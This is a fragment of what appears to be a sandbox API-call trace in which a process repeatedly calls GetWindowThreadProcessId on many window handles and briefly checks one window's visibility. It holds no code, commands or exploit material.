	[0941.774] GetWindowThreadProcessId (in: hWnd=0x10ab6, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x1f18
	[0941.774] GetWindowThreadProcessId (in: hWnd=0x10ab4, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x20a8
	[0941.774] GetWindowThreadProcessId (in: hWnd=0x10a78, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x2004
	[0941.774] GetWindowThreadProcessId (in: hWnd=0x10a68, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x1f88
	[0941.774] GetWindowThreadProcessId (in: hWnd=0x10a4a, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x1f84
	[0941.774] GetWindowThreadProcessId (in: hWnd=0x20a3e, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x2050
	[0941.774] GetWindowThreadProcessId (in: hWnd=0x40528, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x1e04
	[0941.774] GetWindowThreadProcessId (in: hWnd=0x20816, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x1ecc
	[0941.774] GetWindowThreadProcessId (in: hWnd=0x10a2c, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x1e64
	[0941.775] GetWindowThreadProcessId (in: hWnd=0x2056e, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x1b58
	[0941.775] GetWindowThreadProcessId (in: hWnd=0x10a1e, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x1e94
	[0941.775] GetWindowThreadProcessId (in: hWnd=0x10a0e, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x1e28
	[0941.775] GetWindowThreadProcessId (in: hWnd=0x10a0a, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x1df8
	[0941.775] GetWindowThreadProcessId (in: hWnd=0x10a06, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x1da8
	[0941.775] GetWindowThreadProcessId (in: hWnd=0x3060a, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x1c70
	[0941.775] GetWindowThreadProcessId (in: hWnd=0x109ec, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x163c
	[0941.775] GetWindowThreadProcessId (in: hWnd=0x109de, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x1a10
	[0941.775] GetWindowThreadProcessId (in: hWnd=0x109c4, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x186c
	[0941.775] GetWindowThreadProcessId (in: hWnd=0x109b4, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x1d74
	[0941.775] GetWindowThreadProcessId (in: hWnd=0x1099a, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x4c8
	[0941.775] GetWindowThreadProcessId (in: hWnd=0x1098c, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x1960
	[0941.776] GetWindowThreadProcessId (in: hWnd=0x1097c, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x1ce4
	[0941.776] GetWindowThreadProcessId (in: hWnd=0x1093c, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x1b24
	[0941.776] GetWindowThreadProcessId (in: hWnd=0x20942, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x14e0
	[0941.776] GetWindowThreadProcessId (in: hWnd=0x204b0, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x17f0
	[0941.776] GetWindowThreadProcessId (in: hWnd=0x10952, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x854
	[0941.776] GetWindowThreadProcessId (in: hWnd=0x10950, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x1268
	[0941.776] GetWindowThreadProcessId (in: hWnd=0x1094e, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x1624
	[0941.776] GetWindowThreadProcessId (in: hWnd=0x1094c, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x1b9c
	[0941.776] GetWindowThreadProcessId (in: hWnd=0x1094a, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x16f4
	[0941.776] GetWindowThreadProcessId (in: hWnd=0x10948, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x145c
	[0941.776] GetWindowThreadProcessId (in: hWnd=0x1093e, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x17d0
	[0941.776] GetWindowThreadProcessId (in: hWnd=0x206ba, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x1d28
	[0941.776] GetWindowThreadProcessId (in: hWnd=0x1093a, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0xcb8
	[0941.777] GetWindowThreadProcessId (in: hWnd=0x20614, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x1190
	[0941.777] GetWindowThreadProcessId (in: hWnd=0x2041c, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x3a8
	[0941.777] GetWindowThreadProcessId (in: hWnd=0x20420, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x1bd0
	[0941.777] GetWindowThreadProcessId (in: hWnd=0x304c0, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x1bfc
	[0941.777] GetWindowThreadProcessId (in: hWnd=0x108b8, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x1a78
	[0941.777] GetWindowThreadProcessId (in: hWnd=0x108b2, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x1b90
	[0941.777] GetWindowThreadProcessId (in: hWnd=0x108ac, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x1b04
	[0941.777] GetWindowThreadProcessId (in: hWnd=0x108a0, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x1b34
	[0941.777] GetWindowThreadProcessId (in: hWnd=0x1088e, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x1b64
	[0941.777] GetWindowThreadProcessId (in: hWnd=0x1087c, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x1bb0
	[0941.777] GetWindowThreadProcessId (in: hWnd=0x204f6, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x1acc
	[0941.777] GetWindowThreadProcessId (in: hWnd=0x1083e, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x1a2c
	[0941.778] GetWindowThreadProcessId (in: hWnd=0x2042c, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x19a8
	[0941.778] GetWindowThreadProcessId (in: hWnd=0x10836, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x1944
	[0941.778] GetWindowThreadProcessId (in: hWnd=0x10826, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x18c8
	[0941.778] GetWindowThreadProcessId (in: hWnd=0x10822, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x18ac
	[0941.778] GetWindow (hWnd=0x10822, uCmd=0x4) returned 0x0
	[0941.779] IsWindowVisible (hWnd=0x10822) returned 0
	[0941.779] GetWindowThreadProcessId (in: hWnd=0x1081e, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x18ec
	[0941.779] GetWindowThreadProcessId (in: hWnd=0x1081a, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x1898
	[0941.779] GetWindowThreadProcessId (in: hWnd=0x10810, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0xc98
	[0941.779] GetWindowThreadProcessId (in: hWnd=0x1080a, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x153c
	[0941.780] GetWindowThreadProcessId (in: hWnd=0x10806, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x1808
	[0941.780] GetWindowThreadProcessId (in: hWnd=0x10790, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x12a4
	[0941.780] GetWindowThreadProcessId (in: hWnd=0x1078e, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x1740
	[0941.780] GetWindowThreadProcessId (in: hWnd=0x10784, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x16c4
	[0941.780] GetWindowThreadProcessId (in: hWnd=0x107c2, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x1820
	[0941.780] GetWindowThreadProcessId (in: hWnd=0x107b4, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x16ac
	[0941.780] GetWindowThreadProcessId (in: hWnd=0x1079a, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x1858
	[0941.780] GetWindowThreadProcessId (in: hWnd=0x1077e, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x1664
	[0941.780] GetWindowThreadProcessId (in: hWnd=0x10778, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x10b4
	[0941.780] GetWindowThreadProcessId (in: hWnd=0x10774, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x10ac
	[0941.781] GetWindowThreadProcessId (in: hWnd=0x20378, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x10ec
	[0941.781] GetWindowThreadProcessId (in: hWnd=0x10766, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x1068
	[0941.781] GetWindowThreadProcessId (in: hWnd=0x10762, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x17e0
	[0941.781] GetWindowThreadProcessId (in: hWnd=0x1075e, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x102c
	[0941.781] GetWindowThreadProcessId (in: hWnd=0x1075a, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x17a4
	[0941.781] GetWindowThreadProcessId (in: hWnd=0x2035a, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x1050
	[0941.781] GetWindowThreadProcessId (in: hWnd=0x1072c, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x1694
	[0941.781] GetWindowThreadProcessId (in: hWnd=0x1071e, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x1770
	[0941.781] GetWindowThreadProcessId (in: hWnd=0x10710, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x1720
	[0941.781] GetWindowThreadProcessId (in: hWnd=0x10702, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x165c
	[0941.781] GetWindowThreadProcessId (in: hWnd=0x106ca, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x1578
	[0941.782] GetWindowThreadProcessId (in: hWnd=0x204a6, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x16c0
	[0941.782] GetWindowThreadProcessId (in: hWnd=0x106c4, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x161c
	[0941.782] GetWindowThreadProcessId (in: hWnd=0x106c0, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x1638
	[0941.782] GetWindowThreadProcessId (in: hWnd=0x20362, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x15c8
	[0941.782] GetWindowThreadProcessId (in: hWnd=0x106be, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x1554
	[0941.782] GetWindowThreadProcessId (in: hWnd=0x106bc, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x1674
	[0941.782] GetWindowThreadProcessId (in: hWnd=0x106b4, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x1520
	[0941.782] GetWindowThreadProcessId (in: hWnd=0x1068e, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x14bc
	[0941.782] GetWindowThreadProcessId (in: hWnd=0x1067e, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0xf8c
	[0941.782] GetWindowThreadProcessId (in: hWnd=0x1066e, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0xe9c
	[0941.782] GetWindowThreadProcessId (in: hWnd=0x1065e, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x1434
	[0941.782] GetWindowThreadProcessId (in: hWnd=0x1064e, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x14ec
	[0941.783] GetWindowThreadProcessId (in: hWnd=0x1063e, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0xfcc
	[0941.783] GetWindowThreadProcessId (in: hWnd=0x1062e, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x12ac
	[0941.783] GetWindowThreadProcessId (in: hWnd=0x1062a, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x1484
	[0941.783] GetWindowThreadProcessId (in: hWnd=0x10626, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x934
	[0941.783] GetWindowThreadProcessId (in: hWnd=0x10622, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0xc0c
	[0941.783] GetWindowThreadProcessId (in: hWnd=0x1061c, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0xb08
	[0941.783] GetWindowThreadProcessId (in: hWnd=0x10610, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x948
	[0941.783] GetWindowThreadProcessId (in: hWnd=0x1060c, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x1178
	[0941.783] GetWindowThreadProcessId (in: hWnd=0x105fa, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x13e0
	[0941.783] GetWindowThreadProcessId (in: hWnd=0x105ea, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0xcd0
	[0941.783] GetWindowThreadProcessId (in: hWnd=0x105da, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x13fc
	[0941.783] GetWindowThreadProcessId (in: hWnd=0x105c6, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0xdc8
	[0941.783] GetWindowThreadProcessId (in: hWnd=0x105b6, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0xc18
	[0941.784] GetWindowThreadProcessId (in: hWnd=0x105a6, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0xc2c
	[0941.784] GetWindowThreadProcessId (in: hWnd=0x10580, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0xa1c
	[0941.784] GetWindowThreadProcessId (in: hWnd=0x10578, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x1244
	[0941.784] GetWindowThreadProcessId (in: hWnd=0x10574, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0xdb0
	[0941.784] GetWindowThreadProcessId (in: hWnd=0x20356, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x1398
	[0941.784] GetWindowThreadProcessId (in: hWnd=0x10566, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x1358
	[0941.784] GetWindowThreadProcessId (in: hWnd=0x10562, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x1370
	[0941.784] GetWindowThreadProcessId (in: hWnd=0x1055e, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x1340
	[0941.784] GetWindowThreadProcessId (in: hWnd=0x10558, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x130c
	[0941.784] GetWindowThreadProcessId (in: hWnd=0x10550, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x12c0
	[0941.784] GetWindowThreadProcessId (in: hWnd=0x2053a, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x12e4
	[0941.784] GetWindowThreadProcessId (in: hWnd=0x1051a, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x1270
	[0941.785] GetWindowThreadProcessId (in: hWnd=0x1050a, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x1298
	[0941.785] GetWindowThreadProcessId (in: hWnd=0x104fa, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x120c
	[0941.785] GetWindowThreadProcessId (in: hWnd=0x204d6, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x122c
	[0941.785] GetWindowThreadProcessId (in: hWnd=0x104ce, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x11c4
	[0941.785] GetWindowThreadProcessId (in: hWnd=0x202d6, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x11b0
	[0941.785] GetWindowThreadProcessId (in: hWnd=0x104c8, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x1188
	[0941.785] GetWindowThreadProcessId (in: hWnd=0x104c4, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x1148
	[0941.785] GetWindowThreadProcessId (in: hWnd=0x202e6, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x1160
	[0941.785] GetWindowThreadProcessId (in: hWnd=0x30272, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x10fc
	[0941.785] GetWindowThreadProcessId (in: hWnd=0x104bc, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0xe34
	[0941.785] GetWindowThreadProcessId (in: hWnd=0x104ac, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0xea4
	[0941.785] GetWindowThreadProcessId (in: hWnd=0x1048e, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x514
	[0941.786] GetWindowThreadProcessId (in: hWnd=0x1047e, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0xe48
	[0941.786] GetWindowThreadProcessId (in: hWnd=0x1046e, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0xbc8
	[0941.786] GetWindowThreadProcessId (in: hWnd=0x1045e, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0xdf8
	[0941.786] GetWindowThreadProcessId (in: hWnd=0x1044c, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x318
	[0941.786] GetWindowThreadProcessId (in: hWnd=0x10440, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0xcac
	[0941.786] GetWindowThreadProcessId (in: hWnd=0x10438, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x8bc
	[0941.786] GetWindowThreadProcessId (in: hWnd=0x10434, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0xf9c
	[0941.786] GetWindowThreadProcessId (in: hWnd=0x10430, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0xf48
	[0941.786] GetWindowThreadProcessId (in: hWnd=0x10414, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0xe40
	[0941.786] GetWindowThreadProcessId (in: hWnd=0x10410, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0xecc
	[0941.786] GetWindowThreadProcessId (in: hWnd=0x1040c, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0xeb8
	[0941.786] GetWindowThreadProcessId (in: hWnd=0x10408, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0xe80
	[0941.787] GetWindowThreadProcessId (in: hWnd=0x10404, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0xe98
	[0941.787] GetWindowThreadProcessId (in: hWnd=0x10400, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0xe60
	[0941.787] GetWindowThreadProcessId (in: hWnd=0x103fc, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0xee4
	[0941.787] GetWindowThreadProcessId (in: hWnd=0x103ee, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0xf00
	[0941.787] GetWindowThreadProcessId (in: hWnd=0x10398, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0xdf0
	[0941.787] GetWindowThreadProcessId (in: hWnd=0x10388, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0xe1c
	[0941.787] GetWindowThreadProcessId (in: hWnd=0x10380, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0xdd0
	[0941.787] GetWindowThreadProcessId (in: hWnd=0x1036c, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0xd94
	[0941.787] GetWindowThreadProcessId (in: hWnd=0x10368, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0xd74
	[0941.787] GetWindowThreadProcessId (in: hWnd=0x10364, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0xd00
	[0941.787] GetWindowThreadProcessId (in: hWnd=0x1035e, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0xcd8
	[0941.787] GetWindowThreadProcessId (in: hWnd=0x20240, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0xc84
	[0941.788] GetWindowThreadProcessId (in: hWnd=0x30220, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0xca4
	[0941.788] GetWindowThreadProcessId (in: hWnd=0x2010e, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0xc64
	[0941.788] GetWindowThreadProcessId (in: hWnd=0x10344, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0xc24
	[0941.788] GetWindowThreadProcessId (in: hWnd=0x1032a, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0xb84
	[0941.788] GetWindowThreadProcessId (in: hWnd=0x10316, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0xbac
	[0941.788] GetWindowThreadProcessId (in: hWnd=0x102f8, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x384
	[0941.788] GetWindowThreadProcessId (in: hWnd=0x102de, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0xab8
	[0941.788] GetWindowThreadProcessId (in: hWnd=0x102da, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x33c
	[0941.788] GetWindowThreadProcessId (in: hWnd=0x102d0, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0xa44
	[0941.788] GetWindowThreadProcessId (in: hWnd=0x102cc, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0xa64
	[0941.788] GetWindowThreadProcessId (in: hWnd=0x102c8, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x8a8
	[0941.788] GetWindowThreadProcessId (in: hWnd=0x102c4, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0xaf0
	[0941.788] GetWindowThreadProcessId (in: hWnd=0x102c0, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x88c
	[0941.789] GetWindowThreadProcessId (in: hWnd=0x102bc, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0xb04
	[0941.789] GetWindowThreadProcessId (in: hWnd=0x102b0, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x910
	[0941.789] GetWindowThreadProcessId (in: hWnd=0x102ac, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x230
	[0941.789] GetWindowThreadProcessId (in: hWnd=0x30298, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0xac0
	[0941.789] GetWindowThreadProcessId (in: hWnd=0x2029a, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0xab4
	[0941.789] GetWindowThreadProcessId (in: hWnd=0x10262, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0xaac
	[0941.789] GetWindowThreadProcessId (in: hWnd=0x10252, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x3d0
	[0941.789] GetWindowThreadProcessId (in: hWnd=0x10242, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x978
	[0941.789] GetWindowThreadProcessId (in: hWnd=0x10228, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0xa7c
	[0941.789] GetWindowThreadProcessId (in: hWnd=0x10224, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x59c
	[0941.789] GetWindowThreadProcessId (in: hWnd=0x20212, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0xa88
	[0941.789] GetWindowThreadProcessId (in: hWnd=0x1021c, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0xa6c
	[0941.789] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0xa68
	[0941.790] GetWindowThreadProcessId (in: hWnd=0x20206, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x9f8
	[0941.790] GetWindowThreadProcessId (in: hWnd=0x20204, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0xa04
	[0941.790] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x924
	[0941.790] GetWindowThreadProcessId (in: hWnd=0x10200, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x8dc
	[0941.790] GetWindowThreadProcessId (in: hWnd=0x201ec, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x7dc
	[0941.790] GetWindowThreadProcessId (in: hWnd=0x301d6, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x768
	[0941.790] GetWindowThreadProcessId (in: hWnd=0x301e0, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x764
	[0941.790] GetWindowThreadProcessId (in: hWnd=0x201e4, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x820
	[0941.790] GetWindowThreadProcessId (in: hWnd=0x201c6, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x810
	[0941.790] GetWindowThreadProcessId (in: hWnd=0x301f2, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x794
	[0941.790] GetWindowThreadProcessId (in: hWnd=0x401b6, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x83c
	[0942.067] GetWindowThreadProcessId (in: hWnd=0x501be, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x7ac
	[0942.067] GetWindowThreadProcessId (in: hWnd=0x160162, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0xb44
	[0942.067] GetWindowThreadProcessId (in: hWnd=0x108d6, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x6bc
	[0942.067] GetWindowThreadProcessId (in: hWnd=0x500ea, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0xb5c
	[0942.067] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x838
	[0942.067] GetWindowThreadProcessId (in: hWnd=0x800a8, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x4d0
	[0942.067] GetWindowThreadProcessId (in: hWnd=0x400b0, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x4d0
	[0942.067] GetWindowThreadProcessId (in: hWnd=0x300c6, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x4d0
	[0942.067] GetWindowThreadProcessId (in: hWnd=0x300d2, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x4d0
	[0942.067] GetWindowThreadProcessId (in: hWnd=0x300ce, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x4d0
	[0942.068] GetWindowThreadProcessId (in: hWnd=0x300d8, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x4d0
